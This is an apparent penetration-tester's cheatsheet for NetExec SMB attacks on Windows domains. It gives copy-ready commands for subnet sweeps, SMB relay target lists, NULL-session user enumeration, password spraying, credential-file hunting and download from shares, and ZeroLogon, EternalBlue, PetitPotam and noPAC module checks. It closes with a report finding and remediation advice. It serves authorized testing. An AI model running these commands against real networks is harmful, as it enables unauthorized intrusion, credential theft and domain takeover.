π‘οΈ Methodology Checklist
- Subnet sweep:
nxc smb [CIDR]/24β identify live SMB hosts - Check SMB signing (for relay targeting):
nxc smb [CIDR]/24 --gen-relay-list unsigned.txt - NULL session users:
nxc smb [DC_IP] -u '' -p '' --users - NULL session password policy:
nxc smb [DC_IP] -u '' -p '' --pass-pol - Check password policy lockout threshold BEFORE spraying
- Spray (one password):
nxc smb [DC_IP] -u users.txt -p [PASS] --continue-on-success - Look for
(Pwn3d!)in output β indicates local admin - Run vuln checks:
nxc smb [TARGET] -u [USER] -p [PASS] -M zerologon
π― Operational Context
Use when: Starting any Windows/AD engagement β nxc SMB recon gives OS version, SMB signing status, domain membership, and share enumeration in one pass.
Think Dumber First: nxc smb [SUBNET]/24 β scan entire subnet, get OS/signing info for everything. Signing disabled = relay attack viable. Then --shares to enumerate accessible shares. This is the mandatory first step before any Windows attack.
Skip when: N/A β SMB recon should always run at engagement start.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nxc smb [TARGET_NETWORK]/[MASK] | Sweep subnet β discover SMB hosts, OS versions, domain membership |
nxc smb [TARGET_NETWORK]/[MASK] --gen-relay-list relay_targets.txt | Find hosts with SMB signing disabled (NTLM relay targets) |
nxc smb [TARGET_IP] -u '' -p '' | Test NULL session access |
nxc smb [TARGET_IP] -u '' -p '' --pass-pol | Enumerate password policy via anonymous/NULL session |
nxc smb [TARGET_IP] -u '' -p '' --users | Enumerate domain users via anonymous/NULL session |
nxc smb [TARGET_IP] -u '' -p '' --rid-brute [MAX_RID] | RID brute force for user enumeration (when NULL works) |
nxc smb [TARGET_IP] -u '' -p '' --shares | List SMB shares anonymously |
nxc smb [TARGET_IP] -u guest -p '' --shares | List shares as guest |
nxc smb [TARGET_IP] -u [USER_FILE] -p '[PASS]' | Password spray single password against user list |
nxc smb [TARGET_IP] -u [USER_FILE] -p [PASS_FILE] --continue-on-success | Spray multiple passwords, continue after hits |
nxc smb [TARGET_IP] -u [USER_FILE] -p [PASS_FILE] --no-bruteforce --continue-on-success | 1:1 credential validation (user[0] with pass[0], etc.) |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --local-auth | Authenticate with local account (not domain) |
nxc smb [TARGET_IP] -u [USER] -p [PASS] | Test domain credential validity |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares | List shares + READ/WRITE permissions |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern [KW] | Spider a readable share for filenames matching keyword |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern [KW] | Grep file contents across a share for keyword |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file [REMOTE] [LOCAL] | Download a single file from a share |
nxc smb [TARGET_FQDN] --use-kcache --shares | Enumerate shares with a Kerberos .ccache (NTLM disabled) |
π¬ Deep Dive & Workflow
SMB Sweep β What to Look For
nxc smb 172.16.5.0/23
# Output columns:
# SMB IP 445 HOSTNAME [version] [domain] [signing] [SMBv1]
#
# Key indicators:
# signing:False β NTLM relay candidate β add to relay_targets.txt
# (Pwn3d!) β admin access confirmed
# domain name β confirms domain controller identity
# Generate relay target list
nxc smb 172.16.5.0/23 --gen-relay-list relay_targets.txt
# β Contains IPs where SMB signing is NOT enforced
# β Feed to Responder + ntlmrelayxNULL/Anonymous Session Enumeration
# Test NULL session
nxc smb [TARGET_IP] -u '' -p ''
# Success β STATUS_SUCCESS
# Enumerate before spraying (critical β check lockout policy)
nxc smb [TARGET_IP] -u '' -p '' --pass-pol
# β Account Lockout Threshold: 5 β spray max 3 to be safe
# β Observation Window: 30 minutes
# Get user list for spraying
nxc smb [TARGET_IP] -u '' -p '' --users
nxc smb [TARGET_IP] -u '' -p '' --users-export users.txt
# Parse exported JSON user list
sed -i "s/'/\"/g" users.txt && jq -r '.[]' users.txt > userslist.txt
# RID brute (when --users fails)
nxc smb [TARGET_IP] -u '' -p '' --rid-brute 2000
# β Iterates RIDs 500-2000, resolves to usernamesPassword Spraying Workflow
# STEP 1: Get lockout policy first
nxc smb [DC_IP] -u '' -p '' --pass-pol
# β or with valid creds: nxc smb [DC_IP] -u [USER] -p [PASS] --pass-pol
# STEP 2: Build user list from NULL enum or prior recon
# STEP 3: Spray safely (stay under lockout threshold)
nxc smb [DC_IP] -u userslist.txt -p 'Company2024!' --continue-on-success
# β Green (+) = success, Red (-) = fail, Yellow (!) = guest access
# β (Pwn3d!) = local admin on target
# STEP 4: Wait observation window before next spray round
# STEP 5: If multiple passwords, use 1:1 mode (no bruteforce)
nxc smb [DC_IP] -u userslist.txt -p passlist.txt --no-bruteforce --continue-on-successOutput Interpretation
SMB 10.10.10.5 445 DC01 [+] DOMAIN\jsmith:Password1 (Pwn3d!)
β β
valid credential local admin access
SMB 10.10.10.5 445 DC01 [+] DOMAIN\jsmith:Password1
β
valid domain cred (no local admin)
SMB 10.10.10.5 445 DC01 [-] DOMAIN\jsmith:Password1 STATUS_LOGON_FAILURE
β
wrong password
SMB 10.10.10.5 445 DC01 [-] DOMAIN\jsmith:Password1 STATUS_ACCOUNT_LOCKED_OUT
β
STOP SPRAYING
Vulnerability Scanning via SMB
# ZeroLogon (CVE-2020-1472) β unauthenticated DC takeover
nxc smb [DC_IP] -M zerologon
# EternalBlue (MS17-010) β unauthenticated RCE
nxc smb [TARGET_IP] -M ms17-010
# PetitPotam β NTLM relay via EFS RPC
nxc smb [DC_IP] -M petitpotam
# noPAC (CVE-2021-42278/42287) β machine account privesc to DA
nxc smb [DC_IP] -u [USER] -p [PASS] -M nopacReadable Share Loot Workflow
# STEP 1: Enumerate shares + access rights
nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares
# β READ,WRITE / READ / (blank = no access) shown per share
# β Ignore default ADMIN$ / C$ / IPC$ β focus on custom READ shares
# STEP 2: Spider a specific readable share (filenames only)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern txt
# β Walks the share tree, prints paths matching the pattern
# STEP 3: Search file CONTENTS, not just names
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern password
# β --content greps inside files β finds creds in configs, scripts, .xml
# β Combine patterns: run multiple times for pass / cpassword / connectionString
# STEP 4: Download a file you found
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file "folder\\creds.txt" loot.txt
# β REMOTE path is relative to the share root; LOCAL is the save name
# β Upload counterpart: --put-file local.txt "remote\\path.txt"
# STEP 5: When NTLM is disabled, drive the same flow with Kerberos
export KRB5CCNAME=$(realpath [USER].ccache) # TGT from impacket-getTGT
nxc smb [TARGET_FQDN] --use-kcache --shares
nxc smb [TARGET_FQDN] --use-kcache --share [SHARE] --get-file "folder\\creds.txt" loot.txt
# β MUST target the FQDN with -k/--use-kcache β Kerberos validates the SPN host
# FALLBACK: Impacket smbclient (interactive, when nxc spider misbehaves)
impacket-smbclient -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
# β password auth: impacket-smbclient [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
# β then: shares β use [SHARE] β ls β cd "Sub Folder" β get creds.txtNeed a ticket first? See NetExec_LDAP_Kerberos for the
impacket-getTGTβ.ccacheβexport KRB5CCNAMEflow that feeds every--use-kcache/-k -no-passcommand above.
Path Handling Notes
β’ Spaces β quote the whole remote path: "Program Files\\app.config"
β’ Separators β SMB uses BACKSLASHES; in bash escape them ("a\\b") or single-quote ('a\b')
β’ Share vs path β --share is the share NAME; --get-file path is RELATIVE to that share root
β’ FQDN vs IP β NTLM works with IP; Kerberos (-k/--use-kcache) REQUIRES the FQDN + DNS/hosts entry
β’ Case β share names are case-insensitive; deep paths from --spider are safest copy-pasted verbatimπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc not installed | Wrong package name | Install: pip3 install netexec; command is nxc not crackmapexec |
| SMB scan returns nothing | Port 445 filtered | Verify: nmap -p 445 [TARGET]; nxc falls back to 139 if 445 blocked |
| nxc shows 0 results for subnet | CIDR notation wrong | Use: nxc smb 192.168.1.0/24; ensure /24 not /24. |
| Share enum requires creds | Null session disabled | Use valid creds: nxc smb [TARGET] -u [USER] -p [PASS] --shares |
| nxc version mismatch errors | Old version | Update: pip3 install netexec --upgrade; nxc is actively developed with frequent updates |
STATUS_NOT_SUPPORTED on auth | NTLM disabled on target (Kerberos-only) | Switch to tickets: export KRB5CCNAME=... then --use-kcache against the FQDN (not IP) |
KRB_AP_ERR_SKEW | Clock skew > 5 min vs DC | Sync time: sudo ntpdate [DC_IP] (or sudo rdate -n [DC_IP]) before retrying |
smbclient Kerberos / SPNEGO failure | Local smbclient canβt negotiate / no SPN | Use impacket-smbclient -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]; ensure FQDN in /etc/hosts and KRB5CCNAME exported |
π Reporting Trigger
Finding Title: SMB Reconnaissance Reveals Network Topology and Security Posture Impact: Unauthenticated SMB enumeration maps all Windows hosts, identifies OS versions, confirms SMB signing status (relay attack viability), and enumerates accessible shares β providing complete reconnaissance data for targeted attack planning. Root Cause: SMB service exposed on network without access restrictions. SMB signing not enforced across the environment. Recommendation: Enable SMB signing on all Windows hosts via GPO. Restrict SMB access to required source networks. Implement network monitoring for SMB scanning patterns. Apply null session restrictions (RestrictAnonymous).